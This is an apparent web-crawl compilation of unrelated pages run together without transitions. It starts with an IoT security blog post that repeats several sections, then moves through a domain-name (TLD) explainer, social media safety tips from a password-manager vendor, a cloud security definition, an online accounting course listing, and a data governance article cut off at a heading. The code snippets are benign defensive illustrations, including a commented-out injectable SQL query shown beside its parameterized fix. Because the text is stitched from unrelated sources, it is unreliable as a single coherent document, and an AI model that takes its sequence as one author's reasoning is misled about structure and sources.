Let us show you how you can stop phishing immediately with Graphus – the most simple, automated and affordable phishing defense available today.
The Internet of Things (IoT) has revolutionised the way we interact with technology and the world around us. From smart homes to wearable devices, IoT has brought about unprecedented convenience and efficiency.
However, with this new era of connectivity comes a host of security and privacy issues that need to be addressed. As more data is generated from these connected devices, it’s crucial to understand the potential risks involved in IoT-generated big data.
In this blog post, we’ll explore some of the most pressing IoT security issues and how they can be mitigated through powerful IoT security solutions and best practices.
Building trust in IoT devices is essential to ensure that consumers feel comfortable using these innovative technologies. In the absence of effective security measures, malicious actors can easily exploit the vulnerabilities present in IoT systems and steal sensitive data or gain unauthorised access.
One way to combat this issue is through powerful IoT security solutions designed to protect connected devices from a range of potential threats. These solutions include firewalls, intrusion detection systems (IDS), encryption tools, and other specialised software that can detect and block unauthorised network traffic.
In addition, regular firmware updates are critical for ensuring that devices remain secure over time since many vulnerabilities are discovered after products hit the market. By updating firmware regularly, manufacturers can patch any known bugs or weaknesses before they become exploited by attackers.
By building trust in IoT-connected devices through robust security measures such as these, manufacturers can help users reap all of the benefits offered by these technologies without having to worry about their safety or privacy being compromised.
Software and firmware vulnerabilities in IoT devices are among the top concerns of security experts. These vulnerabilities can be exploited by hackers to gain unauthorized access to sensitive information or even take control of the device.
One common vulnerability is outdated software and firmware. Many IoT devices use old versions that have not been updated with new patches, leaving them susceptible to known exploits.
Another issue is poor coding practices that leave code open to exploitation. Developers need to follow best practices when writing code for IoT devices, including regular testing and updates as needed.
Additionally, some IoT devices may have backdoors intentionally built into their firmware for debugging purposes. However, these backdoors could also be used by attackers to bypass security measures.
To address these issues, it’s important for developers and manufacturers of IoT devices to prioritise security in their design processes. Regularly updating software/firmware, implementing secure coding practices, and minimising the use of backdoors are all crucial steps towards building a more secure environment for connected devices.
To build trust in IoT connected devices, it’s crucial to understand the importance of security measures. Consumers need to have confidence that their personal data and privacy are well-protected when using a connected device.
One way to build trust is by providing clear and concise information about how the device collects and uses data. This transparency can help ease concerns about potential misuse or unauthorized access.
Another important factor in building trust is ensuring that software updates are regularly released to address any vulnerabilities or bugs. Users want assurance that their device remains secure even as new threats emerge.
Manufacturers can also build trust by implementing strong authentication measures such as two-factor authentication or biometric identification. These additional layers of security can prevent unauthorised access and give users peace of mind.
Building trust in IoT connected devices requires a collaborative effort between manufacturers, developers, and consumers alike. By prioritising security measures, providing transparent information, and implementing robust authentication protocols, we can ensure that our data remains protected while still enjoying the benefits of these innovative technologies.
With the increasing usage of IoT devices, it is important to understand the security risks that these devices pose. The nature of IoT systems means that there are a number of potential security vulnerabilities, in terms of both software and hardware.
One key risk factor is the use of default passwords or weak authentication mechanisms on IoT devices. This makes them easy targets for hacking attempts, allowing hackers to take control over these vulnerable devices.
Another major risk factor is lack of encryption on data transfer from an IoT device to its network. This can potentially expose sensitive information about users or businesses, making them vulnerable to cyber-attacks.
In addition, many IoT systems have outdated firmware which can be exploited by attackers through known vulnerabilities and weaknesses. Moreover, the shared access point between different connected smart devices could lead to further vulnerability as this increases the attack surface area for intruders.
It's also worth noting that insufficient testing during development phases might leave some bugs unnoticed until devices are deployed in real-life scenarios, rendering protective measures ineffective against zero-day attacks.
Understanding these risks highlights how vital it is for organizations and individuals alike to prioritise implementing strong security measures when setting up their IoT networks and connected devices – before it’s too late!
Addressing IoT security challenges is crucial for building trust in these connected devices. One of the key challenges is software and firmware vulnerabilities, which can be exploited by hackers to gain access to sensitive data or control over an IoT system.
To address this challenge, manufacturers must prioritise regular software updates and patches, as well as implement secure development practices that minimise the risk of introducing vulnerabilities in new releases.
Another critical challenge is data leaks from IoT systems. To prevent such breaches, it’s important to implement robust encryption protocols that protect sensitive information both during transit and storage. This requires a comprehensive approach that considers all aspects of data handling across the entire IoT ecosystem.
Malware risks are also a significant concern for organizations leveraging IoT systems. Addressing this challenge involves implementing endpoint security solutions that detect and remove malware threats before they can compromise device functionality or steal sensitive information.
Additionally, shared network access can introduce security risks if not properly secured. Organizations must deploy strong authentication mechanisms like multi-factor authentication (MFA) or digital certificates to ensure only authorized users have access to networks where connected devices operate.
Inconsistent security standards across different regions also pose a major challenge for securing IoT devices globally. Manufacturers should work with industry associations and regulatory bodies to develop common standards based on best practices in order to promote greater consistency in global cybersecurity regulations governing these technologies.
One of the most critical risks associated with IoT devices and big data is data leaks. With so much sensitive information being collected by these systems, any breach in security could have severe consequences for individuals and organizations alike.
Data leaks can occur in many ways, from a cybercriminal hacking into an insecure device to an employee accidentally sharing confidential information. The problem is exacerbated by the fact that IoT devices often collect vast amounts of data, making it difficult to identify when a leak has occurred.
Unfortunately, many companies prioritise convenience over security when designing their IoT systems. This leads to poor encryption practices and vulnerabilities that hackers can easily exploit.
To mitigate the risk of data leaks from IoT systems, businesses must take proactive measures such as implementing robust encryption protocols, limiting access privileges to sensitive data, and conducting regular vulnerability assessments.
Ultimately, preventing data leaks requires a comprehensive approach that addresses both technical vulnerabilities and human error. By taking steps to secure their IoT systems now before breaches occur will help companies avoid costly legal battles down the line while also protecting customer privacy.
One of the most significant IoT security issues is malware risks. Malware can infiltrate an IoT network and infect multiple devices, making it easier for hackers to steal sensitive data or even take control of the connected devices themselves.
Malware typically enters an IoT system through vulnerabilities in software and firmware, which underscores why keeping all systems up to date with patches is critical. But some malware may also exploit weak device configurations, such as default or easily guessed passwords.
Having robust anti-virus measures on all connected devices can help protect against malware attacks, but this approach alone isn’t enough. Instead, security professionals need to adopt a layered approach that includes firewalls and intrusion detection systems to prevent unauthorised access from outside the network.
Another way to mitigate malware risks is by using encrypted communication protocols between all devices on the network. This ensures that any data transmitted between them remains secure even if attackers manage to intercept it.
Dealing with malware threats in IoT networks requires a multi-faceted approach that begins with regular updates and ends with thorough risk assessments and implementing appropriate cybersecurity solutions.
Shared network access is another IoT security issue that we cannot ignore. When multiple devices share a single network, they also share the same vulnerabilities and risks. A hacker can easily breach one device and gain access to all others on the shared network.
This type of attack is especially dangerous in public places such as hotels or coffee shops where people connect their personal devices to unsecured networks. In addition, many IoT devices lack sufficient authentication measures making them more vulnerable to attacks.
The situation becomes even worse when employees bring their own IoT devices into work environments with unprotected shared networks. This can potentially expose sensitive company information and create more significant security issues for businesses.
To address this problem, it’s essential to employ proper network segmentation techniques to separate critical systems from less secure ones. Additionally, using strong passwords and reliable encryption methods can help protect against unauthorised access attempts.
One of the major challenges in securing IoT devices is the lack of industry foresight. Many manufacturers prioritise speed to market over security, leading to vulnerable and easily hackable devices. In some cases, companies may not even consider cybersecurity until after a breach has occurred.
This lack of foresight can be especially problematic when it comes to firmware updates and patching vulnerabilities. While software updates are common for traditional computing systems, many IoT devices lack this capability or may require manual intervention from the user.
Another issue with industry foresight is that many companies fail to anticipate future threats and emerging attack vectors. As new technologies such as 5G networks continue to emerge, there will likely be new security threats that must be addressed proactively rather than reactively.
Ultimately, addressing these issues requires a shift in priorities within the industry towards proactive security measures rather than simply reacting once an incident occurs. This includes investing in research and development for secure IoT technologies as well as establishing partnerships between manufacturers and cybersecurity experts to ensure comprehensive solutions are developed from the outset.
In today's digital age, Internet of Things (IoT) devices and embedded systems have become an integral part of our daily lives. However, with the rise in IoT adoption comes an increasing need for security measures to protect these devices and their users. Here are some tips on how to protect your IoT systems and devices from cyber threats.
Firstly, it is essential to keep all software and firmware up to date with regular patches and updates. This will help address any identified vulnerabilities that can be exploited by hackers.
Secondly, always use strong passwords when setting up your IoT device accounts. Use a combination of upper and lower-case letters, numbers, symbols, as well as avoiding common words or phrases.
Thirdly, consider implementing multi-factor authentication (MFA), such as biometric authentication or SMS verification, for added security layers.
Fourthly, limit access to your network only to authorized personnel and ensure that each device is connected securely using encryption protocols such as HTTPS or SSL/TLS.
Lastly, regularly monitor your IoT networks for unusual activity patterns that could indicate potential breaches or attacks. By being proactive instead of reactive when it comes to cybersecurity threats, you can stay ahead of malicious actors who target vulnerable systems through unsecured connections.
Inconsistent security standards are a major issue in IoT security. The lack of standardised security protocols means that IoT devices are often left vulnerable to cyberattacks. Different manufacturers may have different approaches to securing their devices, which can make it difficult for consumers to assess the level of protection provided.
This inconsistency also makes it challenging for developers and IT professionals who need to integrate multiple systems with varying levels of security into a cohesive network environment. This can lead to weaknesses in the overall system as well as vulnerabilities that hackers can exploit.
Without consistent standards, there is no way to ensure that every device is secure or even capable of being secured. Some products may be inherently more vulnerable than others due to design flaws or outdated software. It’s essential for industry leaders and regulatory bodies to work together on establishing clear guidelines and best practices for IoT security.
Until these standards are established, companies must take extra precautions when deploying IoT devices and networks by implementing additional measures such as firewalls, intrusion detection systems, encryption protocols, and regular updates/patches. Ultimately, inconsistent security standards put consumers at risk while making it easier for criminals to penetrate corporate networks through these connected endpoints.
When it comes to IoT security, the best approach is always prevention. By following security best practices, along with regular vulnerability assessments and penetration testing, you can protect yourself against the most common cyber threats targeting IoT devices today.
The rise of IoT-enabled vehicles has brought about a new level of convenience and luxury for drivers. However, it also poses significant dangers when security is compromised. With the increasing number of connected cars on the roads, hackers are finding more ways to exploit vulnerabilities in these systems.
Hackers can potentially access sensitive data such as personal information, location history and even control over key vehicle functions like brakes or steering. In 2015, researchers successfully hacked into a Jeep Cherokee’s entertainment system remotely and took control of the vehicle from miles away.
Moreover, with the advent of autonomous driving technology where a car relies solely on sensors and algorithms to drive itself without human intervention, there is an even greater need for robust security measures to be put in place before mass adoption.
To mitigate risks associated with hackable vehicles, automakers must ensure that their systems are secure by design. This means incorporating encryption protocols into all communication channels within the vehicle network and conducting regular software updates to patch any identified vulnerabilities.
Additionally, governments must enforce strong regulations around cybersecurity standards for connected vehicles. As we move towards a future where driverless cars will become ubiquitous on our roads, ensuring smart transportation infrastructure will be an urgent priority to protect consumers’ safety both online and offline.
One of the most significant IoT security issues is the lack of firmware updates for IoT devices. Many manufacturers do not provide regular firmware updates to patch any vulnerabilities discovered in their systems, making them an easy target for attackers.
Without regular firmware updates, IoT devices can become a serious threat to users’ privacy and security. Attackers can exploit unpatched vulnerabilities to gain unauthorised access to sensitive data or even take control of the device itself.
Furthermore, some IoT devices are designed with limited memory and limited processing power, which makes it difficult for manufacturers to provide timely software patches or upgrades when needed.
The responsibility lies both with manufacturers and consumers when it comes to updating firmware on IoT devices. Manufacturers should ensure that they release regular firmware updates, while consumers should regularly check for and install these updates on their connected devices.
Missing firmware updates pose a significant risk in terms of cyber-attacks against vulnerable IoT systems. It is essential that all stakeholders work together towards implementing reliable solutions that address this issue before it leads to major cybersecurity incidents.
Network security is a significant concern when it comes to IoT devices, as they are often connected to the internet and to other devices. These connections create entry points for hackers who can compromise the entire network through a single weak link.
One of the biggest issues with IoT networks is that many devices lack proper authentication protocols or encryption methods, making them vulnerable to unauthorised access. The use of default passwords or no password at all on these devices also makes them easy targets.
Another issue is that many IoT devices communicate using unsecured protocols, which means that sensitive data transmitted over the network could be intercepted and compromised. This includes personal information like login credentials or financial data.
To address these risks, it’s crucial that IoT networks implement strong security measures such as firewalls and intrusion detection systems (IDS). Network segmentation can also help by separating different types of traffic into separate subnets.
It’s important to note that securing an IoT network isn’t just about protecting individual devices but rather creating a comprehensive security strategy for the entire ecosystem. Regular monitoring and updating of software and firmware are essential in maintaining a secure network environment.
APIs play a critical role in the functioning of IoT systems, allowing devices to communicate with each other and share data. However, this also makes them vulnerable to security breaches if not properly secured.
One common issue is the lack of authentication and authorisation protocols for APIs. Unsecured APIs can allow unauthorised access and manipulation of sensitive data, leading to potential privacy violations or even theft.
Another concern is the potential for API attacks through injection or exploitation techniques such as SQL injection or cross-site scripting (XSS). These attacks can be used by hackers to gain access to an entire system or network, causing significant damage.
To prevent these types of attacks, it’s crucial that API providers implement proper security measures such as encryption and strict authentication requirements. Regular monitoring and testing should also be conducted to ensure ongoing protection against new threats.
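As a small, generic illustration of injection-safe coding (plain Python with the standard sqlite3 module, not specific to any IoT platform), compare a string-built query with a parameterized one:

import sqlite3

conn = sqlite3.connect("devices.db")  # hypothetical device database
device_id = input("Device id: ")      # untrusted input from a user or API call

# Vulnerable: string formatting lets crafted input rewrite the query (SQL injection)
# conn.execute("SELECT * FROM devices WHERE id = '%s'" % device_id)

# Safer: a parameterized query, so the driver treats the input strictly as data
rows = conn.execute("SELECT * FROM devices WHERE id = ?", (device_id,)).fetchall()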
In summary, API security should be a top priority for any organisation utilising IoT devices. By taking proactive steps towards securing their APIs, businesses can help safeguard against cyber threats while ensuring data privacy and integrity are maintained.
Physical vulnerabilities are often overlooked when it comes to IoT security, but they can be just as dangerous as digital threats. These vulnerabilities refer to the physical access points that could be exploited by malicious actors to gain unauthorised access to IoT devices or systems.
One of the most common physical vulnerabilities is unsecured network ports on IoT devices. These ports may allow attackers to connect directly to the device and execute commands without any authentication requirements. Another vulnerability is weak passwords or default login credentials that could easily be guessed or found online.
In addition, there are also risks posed by tampering with hardware components in such devices as sensors, cameras, and microphones. Malicious actors could physically manipulate these components to harvest sensitive data or even disrupt a device’s functionality altogether.
To mitigate these physical vulnerabilities, it’s important for organizations and individuals alike to implement robust physical security measures such as locking cabinets and rooms where IoT devices are stored, maintaining strict control over who has access to these areas, and regularly inspecting devices for signs of tampering.
By taking proactive steps towards securing both the digital and physical aspects of their IoT systems and devices, individuals and organizations can significantly reduce their risk of falling victim to cyber-attacks.
There have been several high-profile IoT security breaches in recent years. One of the most notable incidents was the 2016 Mirai botnet attack, which targeted internet-connected devices such as routers and cameras to carry out distributed denial-of-service (DDoS) attacks.
In another instance, a casino was hacked through an internet-connected thermometer installed in a fish tank in their lobby. The hackers were able to gain access to the casino’s network and steal sensitive data from their high-roller database.
Similarly, a vulnerability was discovered in Ring doorbells that allowed hackers to intercept video footage and audio recordings from users’ homes. This breach raised concerns about privacy violations and led to calls for better security measures for smart home devices.
IoT security breaches can also have serious consequences beyond just data theft or privacy violations. In 2015, hackers remotely accessed and took control of a Jeep Cherokee while it was being driven on a highway, demonstrating the potential danger of hackable vehicles.
These examples highlight the need for strong IoT security measures to protect secure devices against cyberattacks and ensure user safety.
Ensuring the security of IoT devices has become a major concern for both consumers and businesses. The lack of consistent security standards across different IoT devices and platforms has made it difficult to implement effective cybersecurity measures. This is where IoT security standards and legislation come into play.
Several organizations have developed their own set of guidelines for securing IoT devices, such as the Internet Society’s Online Trust Alliance (OTA) framework or NIST’s Cybersecurity Framework. These frameworks provide a comprehensive approach to managing cybersecurity risks in an organisation’s infrastructure.
In addition to industry-led efforts, governments around the world are also taking steps towards developing regulations regarding IoT security. For instance, in California, manufacturers must equip all connected devices with “reasonable” security features starting January 1st, 2020 under SB-327.
While these developments are promising, there is still work that needs to be done. Many countries do not yet have any specific laws or regulations concerning IoT device security which may lead to inadequate protection against cyber-attacks on connected systems.
As we continue our journey towards an increasingly interconnected world through various forms of technology like AI-powered robots and self-driving vehicles – it becomes imperative that manufacturers prioritise building secure products from the start rather than leaving it open for potential breaches later.
One of the biggest security challenges facing IoT devices is the gap between mobile networks and cloud servers. Mobile networks often lack the necessary security measures to protect data transmitted from connected devices.
This becomes a problem when sensitive information, such as personal health records or financial data, is being shared across these networks. Hackers can easily intercept this data if it’s not properly secured.
The cloud also presents its own set of challenges. While cloud servers are generally more secure than mobile networks, they’re still vulnerable to attacks like DDoS (distributed denial-of-service) where hackers flood the server with traffic until it crashes.
To address this issue, IoT device manufacturers need to implement strong encryption protocols and ensure that all communication between devices and servers is encrypted. They should also work closely with network providers to develop stronger security measures for mobile networks.
It’s important for consumers to be aware of these gaps in security and take steps to protect themselves by using secure passwords, keeping firmware up-to-date, and avoiding public Wi-Fi when transmitting sensitive information from their IoT devices.
One of the major IoT security issues is limited device management. With the rapid growth of IoT devices, it’s becoming increasingly challenging to manage and control them effectively.
Limited device management refers to a scenario where there are too many connected devices with different operating systems, firmware versions, and security protocols that make it difficult for IT teams to monitor all of them efficiently.
Additionally, as new vulnerabilities emerge within these devices, they need to be updated or patched regularly which can be cumbersome for those responsible for their management.
Without proper visibility into each device on a network and its current status in terms of patching levels and compliance standards; an organisation may not know what kind of threat vectors exist or how they could cause damage if exploited by malicious actors.
To address this challenge requires organizations to deploy effective endpoint protection solutions that can help detect potential threats before they become catastrophic. These solutions should also include automatic updates so that patches are applied quickly without requiring manual intervention from administrators.
Physical security is an often overlooked aspect of IoT security, but it’s just as important as any other. Physical access to an IoT device can allow for unauthorised tampering or data theft.
One example of a physical vulnerability is the lack of locks on server cabinets or unsecured storage locations for devices. This puts them at risk from anyone who has physical access to the area they are stored in.
Another issue with physical security arises when employees leave their workstations unlocked and unattended, allowing others to gain access to sensitive information stored on their devices.
To mitigate these risks, it's essential that organizations establish clear policies and guidelines around physical security measures, such as locking cabinets and using secure employee identification systems.
Moreover, regular training sessions should also be conducted with employees regarding the importance of maintaining physical security measures within the workplace environment.
In short, proper physical security controls must be implemented alongside standard IT procedures; this will help prevent unauthorised people from accessing critical assets and keep valuable data safe from prying eyes.
Remote access is a fundamental aspect of Internet of Things (IoT) devices. It allows users to remotely connect and interact with their IoT device from anywhere in the world, which is both convenient and efficient. However, remote access can also be a security risk if not properly secured.
Hackers can exploit vulnerabilities in remote access protocols to gain unauthorised access to an IoT system. Once they have gained entry, they can steal sensitive data or even take control of the entire network.
To prevent this from happening, it’s essential that you implement proper remote access security measures on your IoT devices. One way to do this is by using strong encryption techniques like Transport Layer Security (TLS).
Additionally, implementing multi-factor authentication can help reduce the risk of unauthorised login attempts. This requires users to provide additional information beyond just their username and password before being granted access.
Regularly monitoring your network traffic for suspicious activity can help detect any potential breaches early on so that you can take immediate action.
Ensuring proper remote access security will go a long way in securing your IoT systems and protecting them against cyber threats.
Encrypted data transfer is one of the most important aspects of IoT security. It involves encrypting data before it is transmitted between devices or to a remote server, so that even if an attacker intercepts the data, they cannot read its contents without the encryption key.
Encryption algorithms are used to protect the confidentiality and integrity of data as it moves across networks. These algorithms use complex mathematical operations to scramble data into unreadable code, which can only be decoded using a secret encryption key.
There are several protocols for encrypted data transfer in IoT systems such as Transport Layer Security (TLS) and Secure Sockets Layer (SSL). These protocols provide secure communication channels by encrypting all traffic between devices and servers.
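As an illustration only, Python's standard ssl module shows roughly what a TLS-protected connection involves; the endpoint name below is a hypothetical placeholder:

import socket
import ssl

context = ssl.create_default_context()  # sane defaults: certificate validation, modern protocol versions

host = "device-gateway.example.com"     # hypothetical IoT gateway endpoint
with socket.create_connection((host, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=host) as tls:
        print(tls.version())                    # e.g. "TLSv1.3"
        tls.sendall(b"sensor-reading: 21.7\n")  # encrypted in transit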
However, implementing encrypted data transfer can be challenging due to factors such as limited device resources, network latency and compatibility issues with other protocols. Therefore, developers need to carefully consider which encryption protocol and algorithm best fit their specific application needs while maintaining performance efficiency.
Incorporating encrypted data transfer into IoT systems is crucial for protecting sensitive information from unauthorised access or tampering.
In the rapidly evolving world of IoT, security and privacy issues continue to pose significant challenges. But these risks can be managed with powerful IoT security solutions that address vulnerabilities such as software and firmware weaknesses, data leaks, malware risks, inconsistent security standards and more.
By implementing strong security measures like network-based firewalls, encrypted data transfer protocols, physical device protection and remote access controls, we can ensure the safety and integrity of our IoT systems. It's also important for industry leaders to adopt a unified approach to setting standard guidelines that make security a priority throughout the device manufacturing process.
At the end of the day, it's up to us all – manufacturers, developers, and users alike – to understand the risks associated with connected devices so that we can build trust in IoT technology while keeping our personal information safe from harm. Taking responsibility today for securing tomorrow's digital landscape, through better collaboration on secure frameworks across all stakeholders, is necessary if we want successful growth in this new era of innovation.
What is a TLD?
“A top level domain (TLD) is one of the domains at the highest level in the hierarchical Domain Name System of the Internet.”
— Wikipedia – http://en.wikipedia.org/wiki/Top-level_domain
The best example of a TLD is the most common, popular and well known TLD: .com.
In the example of www.alpineweb.com, the .com portion is the Top Level Domain. It follows then that alpineweb.com is a second level domain and www.alpineweb.com is a third level domain.
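One quick way to see the hierarchy in code (a toy sketch that ignores multi-part suffixes such as .co.uk):

domain = "www.alpineweb.com"
labels = domain.split(".")
tld = labels[-1]                      # "com", the top level domain
second_level = ".".join(labels[-2:])  # "alpineweb.com"
third_level = ".".join(labels[-3:])   # "www.alpineweb.com"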
So why are there new TLDs?
The short answer is to increase your website naming options.
The king of TLDs, .COM, is approaching its 30th birthday, and many of the most common and valuable domain names are already registered. For many business owners, finding a suitable domain name is difficult and often requires a less-than-optimal compromise.
Many new TLDs are specific to interests, locations and industries. Your web address can let people know what you do or where you might do it. Unique and memorable TLDs are easy to remember and can make it easy for your website to be found online.
With hundreds of TLDs now available and more being introduced every year, now is the time to acquire the perfect domain for you, your organization or business.
Some examples of new TLDs are .club, .guru, .nyc, .photography and .shop.
AlpineWeb will be adding new TLDs on a monthly basis and will occasionally offer promotional pricing.
Choosing New Domain Names
Finding the right Domain Name is essential. Seek a Domain Name that is easy to remember, easy to spell and specific to your website.
Using real words rather than alternative spellings or made up names is more effective in being found online.
To search for your new TLD, visit the Domain Checker page.
Phishing attacks occur when cybercriminals trick their victims into sharing personal information, such as passwords or credit card numbers, by pretending to be someone they’re not.
Updated on August 19, 2024.
Social media plays a vital role in allowing people from all over the world to communicate almost instantly; however, it’s important to ensure your social media accounts are safe from cybercriminals and other individuals with malicious intent.
Here are seven tips to help you stay safe on social media.
1. Use strong passwords
Cyber attacks are growing in complexity and frequency, which makes your password choice more important than ever. To keep your social media accounts from getting hacked, it's important to secure them with strong passwords.
Here are some tips to help ensure your passwords are strong (a short password-generator sketch follows this list):
- Include a combination of letters, special characters and numbers
- Make your password a minimum length of 16 characters
- Avoid any personal information that can be found online, such as your birthday, school, family members or your dog’s name
- Avoid reusing the same password or variations of the same password across multiple accounts
- Use a password manager to create and store strong, unique passwords in a secure vault
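As an illustration of these rules, Python's standard secrets module can generate a password that satisfies them (a generic sketch, not a Keeper feature):

import secrets
import string

def generate_password(length=16):
    # letters, numbers and special characters, chosen with a cryptographically secure RNG
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # e.g. k#V9w!mQ2@xR7$pL (different on every run)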
2. Enable Multi-Factor Authentication (MFA)
Multi-factor authentication is important to enable on your online accounts since it adds additional layers of security. For example, if someone were to find out what your Instagram password is, having MFA enabled on your account would prevent them from being able to gain access to it. This is because they’d have to verify your identity, which they won’t be able to do.
Here are some types of MFA to consider adding to your accounts:
- Authenticator apps: An authenticator app generates Time-based One-Time Password (TOTP) codes every 30-60 seconds. To verify your identity using this type of MFA, you just copy and paste the TOTP code from the authenticator app into the login portal after entering your password (a short TOTP sketch follows this list).
- Hardware security keys: Hardware security keys are USB-like devices that are used to verify your identity by tapping or inserting it into your device.
- SMS and email tokens: SMS and email tokens are one of the most popular methods of authentication because of their ease of use. With this type of MFA, you receive a TOTP code through text message or email and enter that code into the login portal after inputting your password.
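To make the authenticator-app option above concrete, here is a minimal sketch using the third-party pyotp library (purely illustrative; any standard TOTP app works the same way):

import pyotp  # pip install pyotp

secret = pyotp.random_base32()  # shared once between the service and your authenticator app
totp = pyotp.TOTP(secret)       # 30-second time step by default

print(totp.now())               # the 6-digit code you would type at login
print(totp.verify(totp.now()))  # True; this is how the service checks the code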
3. Be selective with your friend and follow requests
When it comes to social media, it's important to be cautious about the people you let follow your accounts. If you don't know the person sending you a friend or follow request, it's safer to decline their invitation. This is because it could be a fake account attempting to obtain your personal information by browsing your profile, or someone attempting to stalk or harass you.
4. Don’t post personal information
While it's tempting to share personal information about your life on social media, avoid publishing critical personal information, such as your home address, credit card number or phone number, as this could be used to steal your identity. A best practice is to avoid oversharing on social media, so no one with malicious intent can easily steal your identity.
5. Don’t share your travel plans before they happen
It’s common for people to post their vacations on social media. After all, is it really a vacation if you don’t document it on Instagram? If you post about your future travel plans on social media, someone could target your home since they’re aware that you’ll be gone for a period of time. To prevent this from happening, avoid sharing your geolocation when traveling and always share the least amount of information possible as you don’t know who could be watching your activity through your posts. If you are traveling and want to post about it, the safest thing to do is post your vacation pictures when you’re back home.
6. Be cautious of phishing attempts
Phishing is when cybercriminals try to trick you into revealing personal information by pretending to be someone they're not. When cybercriminals carry out phishing attacks on social media, they often send direct messages containing malicious links, with a message urging you to click on them. Clicking these links can lead you to websites that look legitimate but are designed to steal your information or immediately infect your device with malware. To avoid falling victim to these phishing attempts, it's important to be aware of them and learn to spot them.
Some common indicators of phishing include:
- Urgent language
- Being threatened with serious consequences
- Offers that seem too good to be true
- Unsolicited messages containing links and attachments
- Misspellings and grammatical errors
- Being asked for your personal information
7. Use the strongest privacy settings
Additionally, you should ensure that you use the strongest privacy settings on your social media accounts. Some settings you should consider enabling include:
- Making your profile private
- Hiding your friend or follow list
- Hiding your posts from the public
- Disabling searchability in Google and other search engines
Protect your social media accounts
The posts you make on your social media accounts can affect your digital footprint and make it easier for cybercriminals to target you. However, by taking steps to secure your social media accounts you can help keep your information safe while also continuing to enjoy your social media apps like you usually do.
Curious to see how a password manager helps you secure your social media accounts? Start a free 30-day trial of Keeper® today.
Cloud security is the practice of protecting cloud-based systems, applications, and data from various types of cyber threats such as unauthorized access, data breaches, and data loss. Cloud security involves implementing specialized security controls and technologies to safeguard cloud environments from various types of attacks such as Distributed Denial of Service (DDoS) attacks, malware attacks, and phishing attacks.

Cloud security is critical for ensuring the confidentiality, integrity, and availability of cloud-based resources. Confidentiality refers to preventing unauthorized access to sensitive data, integrity refers to ensuring that data remains unchanged and accurate, and availability refers to ensuring that cloud-based resources are accessible when needed.

Some of the key components of cloud security include access control, data encryption, identity and access management, security monitoring, and incident response. Access control is the process of controlling and managing access to cloud resources, typically through the use of user authentication, authorization, and permissions. Data encryption involves the use of encryption algorithms to protect data from unauthorized access. Identity and access management (IAM) involves managing user identities and their access privileges to cloud resources. Security monitoring involves continuously monitoring cloud environments for potential threats and incidents. Incident response involves the process of responding to and managing security incidents and breaches.

To ensure effective cloud security, organizations should adopt a risk-based approach to identify and prioritize their security needs. They should also ensure that their cloud security strategy aligns with their overall business objectives, comply with industry regulations and standards, and engage in regular security assessments and testing.
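For instance, the data-encryption component can be as simple as a symmetric cipher. This sketch uses the third-party cryptography package and is purely illustrative:

from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()  # in practice, keep this in a key-management service, not in code
cipher = Fernet(key)

token = cipher.encrypt(b"customer record #1024")  # ciphertext, safe to store in the cloud
print(cipher.decrypt(token))                      # b'customer record #1024', recoverable only with the key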
Creator: University of Virginia
Category: Software > Computer Software > Educational Software
Topic: Business, Finance
Tag: benefits, costs, decision, decisions, profit
Availability: In stock
Price: USD 79.00
This course, developed at the Darden School of Business at the University of Virginia and taught by top-ranked faculty, will teach you the fundamentals of managerial accounting including how to navigate the financial and related information managers need to help them make decisions.
You'll learn about cost behavior and cost allocation systems, how to conduct cost-volume-profit analysis, and how to determine if costs and benefits are relevant to your decisions. By the end of this course, you will be able to:
- Describe different types of costs and how they are represented graphically
- Conduct cost-volume-profit analyses to answer questions around breaking even and generating profit
- Calculate and allocate overhead rates within both traditional and activity-based cost allocation systems
- Distinguish costs and benefits that are relevant from those that are irrelevant for a given management decision
- Determine a reasonable course of action, given the financial impact, for a given management decision
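As a taste of the cost-volume-profit material: the break-even point is fixed costs divided by the contribution margin per unit. A short sketch with made-up numbers:

fixed_costs = 50_000.0         # e.g. monthly rent and salaries (hypothetical)
price_per_unit = 25.0
variable_cost_per_unit = 15.0

contribution_margin = price_per_unit - variable_cost_per_unit  # 10.0 per unit
break_even_units = fixed_costs / contribution_margin           # 5,000 units to break even

# Units needed to hit a target profit follow the same formula:
target_profit = 20_000.0
units_for_target = (fixed_costs + target_profit) / contribution_margin  # 7,000 units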
Data governance establishes the structures, principles, and approaches that companies use to make decisions about all relevant data issues. By contrast, data management is about the practices and tools to make data available and useful. Both areas aim to make data available, secure, and efficient. But the technical practices of data management rely on the policy and principles of data governance.
This article will introduce and compare these two important areas. Data governance and data management are both important elements of a healthy digital ecosystem – they are at the heart of a successful digital transformation. By the time we’re through, you’ll have no trouble telling the difference!
What is data governance?
Data governance is one specific component of organizational governance, risk, and compliance procedures. Data governance tries to achieve the following goals:
- Reliability of access, retrieval, and permissions
- Compliance with relevant legal frameworks
- Security of all data within an organization.
There are many tools to make this happen. Good data governance could be achieved through:
- A clear template for decision making
- Explicit structures of accountability
- Creating strong methods for harmonizing data across an organization.
These issues are important for organizations of any size. However, strong data governance is absolutely essential in larger organizations. If a company has a range of different sites, tech sprawl, and many separate business units, it becomes very hard to know who is responsible for data policies.
Even the simple matter of who is responsible for decision making might be unclear to regular employees. Indeed, 2020 research from Deloitte suggests that this is a problem for "a surprising number of organizations". As a result, governance optimization should be part of any digital transformation program.
What is data management?
Data management works on the practical side of data. Data management helps companies to collect, store, organize, protect, and maintain data throughout its lifecycle.
Just like data governance, data management helps to make sure that all data in a company is high-quality, available, reliable, and useful. However, data management does this through different activities. Those might include:
- data integration
- data quality assurance
- data storage
- data security
- data privacy
- data migration
- data strategy development.
Effective data management enables organizations to make informed decisions, identify opportunities, and address challenges. It also contributes to improved operational efficiency, better customer experiences, and enhanced competitiveness in the market. As data continues to grow in volume and complexity, proper data management becomes increasingly vital for businesses and institutions.
Data management also is one of the core practical competencies that will help to accelerate digital transformation.
How are data governance and data management similar?
Data management and data governance are closely related concepts. They work together to ensure the proper handling, quality, security, and usability of data within an organization. While they have distinct focuses, they share similarities and often overlap in their objectives and practices.
- The two areas have common goals. Both data management and data governance aim to improve the overall quality, accuracy, and reliability of data. They strive to ensure that data is available, accessible, and meaningful to support business processes, decision-making, and strategic initiatives.
- They are both necessary for solid compliance. Data governance plays a significant role in ensuring compliance with industry regulations, legal requirements, and data protection laws. Data management supports these efforts by implementing the necessary controls and processes to handle data appropriately.
- Both teams are fundamentally collaborative. They require collaboration across various departments and roles within an organization. Effective communication and coordination are essential to ensure that data-related practices are standardized and followed consistently.
How are data governance and data management different?
